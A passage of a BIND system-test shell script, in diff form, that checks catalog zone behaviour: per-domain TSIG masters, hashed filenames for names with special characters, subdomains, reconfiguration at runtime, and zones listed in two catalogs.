+grep -v "Transfer failed." dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +########################################################################## +echo_i "Testing TSIG keys for masters set per-domain" +n=$((n+1)) +echo_i "adding a domain dom9.example. to primary via RNDC, with transfers allowed only with TSIG key ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom9.example.db +echo "@ IN NS invalid." >> ns1/dom9.example.db +rndccmd 10.53.0.1 addzone dom9.example. '{type primary; file "dom9.example.db"; allow-transfer { key tsig_key; }; };' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom9.example. is now served by primary ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom9.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "adding domain dom9.example. to catalog1 zone with a valid masters suboption (IP with TSIG) ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN PTR dom9.example. + update add label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN A 10.53.0.1 + update add label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN TXT "tsig_key" + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom9.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom9.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom9.example. is accessible on secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom9.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "change TSIG key name on primary ($n)" +ret=0 +rndccmd 10.53.0.1 modzone dom9.example. '{type primary; notify yes; file "dom9.example.db"; allow-transfer { key next_key; }; };' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "update TSIG key name in catalog zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update del label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN TXT "tsig_key" + update add label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN TXT "next_key" + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: modifying zone 'dom9.example' from catalog 'catalog1.example'" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "update zone contents and reload ($n)" +ret=0 +echo "@ 3600 IN SOA . . 2 3600 3600 3600 3600" > ns1/dom9.example.db +echo "@ IN NS ns2" >> ns1/dom9.example.db +echo "ns2 IN A 10.53.0.2" >> ns1/dom9.example.db +rndccmd 10.53.0.1 reload dom9.example. || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "wait for primary to update zone ($n)" +ret=0 +wait_for_a @10.53.0.1 ns2.dom9.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "wait for secondary to update zone ($n)" +ret=0 +wait_for_a @10.53.0.2 ns2.dom9.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "deleting domain dom9.example. from catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN PTR dom9.example. + update delete label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN A 10.53.0.1 + update delete label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN TXT "next_key" + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: deleting zone 'dom9.example' from catalog 'catalog1.example' - success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom9.example. is no longer accessible on secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom9.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "adding domain dom9.example. to catalog1 zone with an invalid masters suboption (TSIG without IP) ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN PTR dom9.example. + update add label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN TXT "tsig_key" + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom9.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "error \"failure\" while trying to generate config for zone \"dom9.example\"" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "deleting domain dom9.example. from catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN PTR dom9.example. + update delete label1.masters.f0f989bc71c5c8ca3a1eb9c9ab5246521907e3af.zones.catalog1.example. 3600 IN TXT "tsig_key" + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: deleting zone 'dom9.example' from catalog 'catalog1.example'" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing catalog entries that can't be represented as filenames" +# note: we need 4 backslashes in the shell to get 2 backslashes in DNS +# presentation format, which is 1 backslash on the wire. +for special in \ + this.is.a.very.very.long.long.long.domain.that.will.cause.catalog.zones.to.generate.hash.instead.of.using.regular.filename.dom10.example \ + this.zone/domain.has.a.slash.dom10.example \ + this.zone\\\\domain.has.backslash.dom10.example \ + this.zone:domain.has.a.colon.dom.10.example +do + # hashes below are generated by: + # python ${TOP}/contrib/scripts/catzhash.py "${special}" + + case "$special" in + this.is.a.very.very.long.long.long.domain.that.will.cause.catalog.zones.to.generate.hash.instead.of.using.regular.filename.dom10.example) + hash=825f48b1ce1b4cf5a041d20255a0c8e98d114858 + db=__catz__4d70696f2335687069467f11f5d5378c480383f97782e553fb2d04a7bb2a23ed.db + ;; + this.zone/domain.has.a.slash.dom10.example) + hash=e64cc64c99bf52d0a77fb16dd7ed57cf925a36aa + db=__catz__46ba3e1b28d5955e5313d5fee61bedc78c71d08035aa7ea2f7bf0b8228ab3acc.db + ;; + this.zone\\\\domain.has.backslash.dom10.example) + hash=91e27e02153d38cf656a9b376d7747fbcd19f985 + db=__catz__b667f7ff802c0895e0506699951cff9a1cab68c5ef8546aa0d07425f244ed870.db + ;; + this.zone:domain.has.a.colon.dom.10.example) + hash=8b7238bf4c34045834c573ba4116557ebb24d33c + db=__catz__5c721f7872913a4e7fa8ad42589cce5dd6e551a4c9e6ab3f86e77c0bbc7c2ca6.db + ;; + esac + + n=$((n+1)) + echo_i "checking that ${special}. is not served by primary ($n)" + ret=0 + wait_for_no_soa @10.53.0.1 "${special}" dig.out.test$n || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "Adding a domain ${special}. to primary via RNDC ($n)" + ret=0 + echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom10.example.db + echo "@ IN NS invalid." >> ns1/dom10.example.db + rndccmd 10.53.0.1 addzone '"'"${special}"'"' '{type primary; file "dom10.example.db";};' || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking that ${special}. is now served by primary ($n)" + ret=0 + wait_for_soa @10.53.0.1 "${special}." dig.out.test$n || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + nextpart ns2/named.run >/dev/null + + n=$((n+1)) + echo_i "Adding domain ${special}. to catalog1 zone ($n)" + ret=0 + $NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add ${hash}.zones.catalog1.example 3600 IN PTR ${special}. + send +END + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "waiting for secondary to sync up ($n)" + ret=0 + wait_for_message ns2/named.run "catz: adding zone '$special' from catalog 'catalog1.example'" && + wait_for_message ns2/named.run "transfer of '$special/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking that ${special}. is served by secondary ($n)" + ret=0 + wait_for_soa @10.53.0.2 "${special}." dig.out.test$n || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking that zone-directory is populated with a hashed filename ($n)" + ret=0 + wait_for_zonefile "ns2/zonedir/$db" || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "removing domain ${special}. from catalog1 zone ($n)" + ret=0 + $NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete ${hash}.zones.catalog1.example + send +END + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "waiting for secondary to sync up ($n)" + ret=0 + wait_for_message ns2/named.run "zone_shutdown: zone ${special}/IN: shutting down" || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking that ${special}. is not served by secondary ($n)" + ret=0 + wait_for_no_soa @10.53.0.2 "${special}." dig.out.test$n || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking that zone-directory is emptied ($n)" + ret=0 + wait_for_no_zonefile "ns2/zonedir/$db" || ret=1 + wait_for_no_zonefile "ns2/zonedir/$db.jnl" || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +done + +########################################################################## +echo_i "Testing adding a domain and a subdomain of it" +n=$((n+1)) +echo_i "checking that dom11.example. is not served by primary ($n)" +ret=0 +wait_for_no_soa @10.53.0.1 dom11.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding a domain dom11.example. to primary via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom11.example.db +echo "@ IN NS invalid." >> ns1/dom11.example.db +rndccmd 10.53.0.1 addzone dom11.example. '{type primary; file "dom11.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom11.example. is now served by primary ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom11.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Adding domain dom11.example. to catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add 0580d70e769c86c8b951a488d8b776627f427d7a.zones.catalog1.example. 3600 IN PTR dom11.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom11.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom11.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom11.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom11.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that subdomain.of.dom11.example. is not served by primary ($n)" +ret=0 +wait_for_rcode NXDOMAIN SOA @10.53.0.1 subdomain.of.dom11.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding a domain subdomain.of.dom11.example. to primary via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/subdomain.of.dom11.example.db +echo "@ IN NS invalid." >> ns1/subdomain.of.dom11.example.db +rndccmd 10.53.0.1 addzone subdomain.of.dom11.example. '{type primary; file "subdomain.of.dom11.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that subdomain.of.dom11.example. is now served by primary ($n)" +ret=0 +wait_for_soa @10.53.0.1 subdomain.of.dom11.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Adding domain subdomain.of.dom11.example. to catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add 25557e0bdd10cb3710199bb421b776df160f241e.zones.catalog1.example. 3600 IN PTR subdomain.of.dom11.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'subdomain.of.dom11.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'subdomain.of.dom11.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that subdomain.of.dom11.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 subdomain.of.dom11.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "removing domain dom11.example. from catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete 0580d70e769c86c8b951a488d8b776627f427d7a.zones.catalog1.example + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "zone_shutdown: zone dom11.example/IN: shutting down" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom11.example. is not served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom11.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that subdomain.of.dom11.example. is still served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 subdomain.of.dom11.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "removing domain subdomain.of.dom11.example. from catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete 25557e0bdd10cb3710199bb421b776df160f241e.zones.catalog1.example + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "zone_shutdown: zone subdomain.of.dom11.example/IN: shutting down" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that subdomain.of.dom11.example. is not served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 subdomain.of.d11.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing adding a catalog zone at runtime with rndc reconfig" +n=$((n+1)) +echo_i "checking that dom12.example. is not served by primary ($n)" +ret=0 +wait_for_no_soa @10.53.0.1 dom12.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding a domain dom12.example. to primary via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom12.example.db +echo "@ IN NS invalid." >> ns1/dom12.example.db +rndccmd 10.53.0.1 addzone dom12.example. '{type primary; file "dom12.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom12.example. is now served by primary ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom12.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Adding domain dom12.example. to catalog4 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add 871d51e5433543c0f6fb263c40f359fbc152c8ae.zones.catalog4.example. 3600 IN PTR dom12.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom12.example. is not served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom12.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +n=$((n+1)) +echo_i "reconfiguring secondary - adding catalog4 catalog zone ($n)" +ret=0 +sed -e "s/^#T1//g" < ns2/named1.conf.in > ns2/named.conf.tmp +copy_setports ns2/named.conf.tmp ns2/named.conf +rndccmd 10.53.0.2 reconfig || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom12.example' from catalog 'catalog4.example'" && +wait_for_message ns2/named.run "transfer of 'dom12.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom7.example. is still served by secondary after reconfiguration ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom7.example. dig.out.test$n -b 10.53.0.1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +n=$((n+1)) + +echo_i "checking that dom12.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom12.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "reconfiguring secondary - removing catalog4 catalog zone, adding non-existent catalog5 catalog zone ($n)" +ret=0 +sed -e "s/^#T2//" < ns2/named1.conf.in > ns2/named.conf.tmp +copy_setports ns2/named.conf.tmp ns2/named.conf +$RNDC -c ../common/rndc.conf -s 10.53.0.2 -p "${CONTROLPORT}" reconfig > /dev/null 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "reconfiguring secondary - removing non-existent catalog5 catalog zone ($n)" +ret=0 +copy_setports ns2/named1.conf.in ns2/named.conf +rndccmd 10.53.0.2 reconfig || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom12.example. is not served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom12.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "removing domain dom12.example. from catalog4 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete 871d51e5433543c0f6fb263c40f359fbc152c8ae.zones.catalog4.example. 3600 IN PTR dom12.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing having a zone in two different catalogs" +n=$((n+1)) +echo_i "checking that dom13.example. is not served by primary ($n)" +ret=0 +wait_for_no_soa @10.53.0.1 dom13.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding a domain dom13.example. to primary ns1 via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom13.example.db +echo "@ IN NS invalid." >> ns1/dom13.example.db +echo "@ IN A 192.0.2.1" >> ns1/dom13.example.db +rndccmd 10.53.0.1 addzone dom13.example. '{type primary; file "dom13.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom13.example. is now served by primary ns1 ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom13.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding a domain dom13.example. to primary ns3 via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns3/dom13.example.db +echo "@ IN NS invalid." >> ns3/dom13.example.db +echo "@ IN A 192.0.2.2" >> ns3/dom13.example.db +rndccmd 10.53.0.3 addzone dom13.example. '{type primary; file "dom13.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom13.example. is now served by primary ns3 ($n)" +ret=0 +wait_for_soa @10.53.0.3 dom13.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Adding domain dom13.example. to catalog1 zone with ns1 as primary ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add 8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog1.example. 3600 IN PTR dom13.example. + update add masters.8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog1.example. 3600 IN A 10.53.0.1 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom13.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom13.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "checking that dom13.example. is served by secondary and that it's the one from ns1 ($n)" +ret=0 +wait_for_a @10.53.0.2 dom13.example. dig.out.test$n || ret=1 +grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding domain dom13.example. to catalog2 zone with ns3 as primary ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.3 ${PORT} + update add 8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog2.example. 3600 IN PTR dom13.example. + update add masters.8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog2.example. 3600 IN A 10.53.0.3 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom13.example. is served by secondary and that it's still the one from ns1 ($n)" +ret=0 +wait_for_a @10.53.0.2 dom13.example. dig.out.test$n || ret=1 +grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Deleting domain dom13.example. from catalog2 ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.3 ${PORT} + update delete 8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog2.example. 3600 IN PTR dom13.example. + update delete masters.8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog2.example. 3600 IN A 10.53.0.3 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom13.example. is served by secondary and that it's still the one from ns1 ($n)" +ret=0 +wait_for_a @10.53.0.2 dom13.example. dig.out.test$n || ret=1 +grep "192.0.2.1" dig.out.test$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Deleting domain dom13.example. from catalog1 ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete 8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog1.example. 3600 IN PTR dom13.example. + update delete masters.8d7989c746b3f92b3bba2479e72afd977198363f.zones.catalog1.example. 3600 IN A 10.53.0.2 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: update_from_db: new zone merged" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom13.example. is no longer served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom13.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing having a regular zone and a zone in catalog zone of the same name" +n=$((n+1)) +echo_i "checking that dom14.example. is not served by primary ($n)" +ret=0 +wait_for_no_soa @10.53.0.1 dom14.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding a domain dom14.example. to primary ns1 via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom14.example.db +echo "@ IN NS invalid." >> ns1/dom14.example.db +echo "@ IN A 192.0.2.1" >> ns1/dom14.example.db +rndccmd 10.53.0.1 addzone dom14.example. '{type primary; file "dom14.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom14.example. is now served by primary ns1 ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom14.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding a domain dom14.example. to primary ns3 via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns3/dom14.example.db +echo "@ IN NS invalid." >> ns3/dom14.example.db +echo "@ IN A 192.0.2.2" >> ns3/dom14.example.db +rndccmd 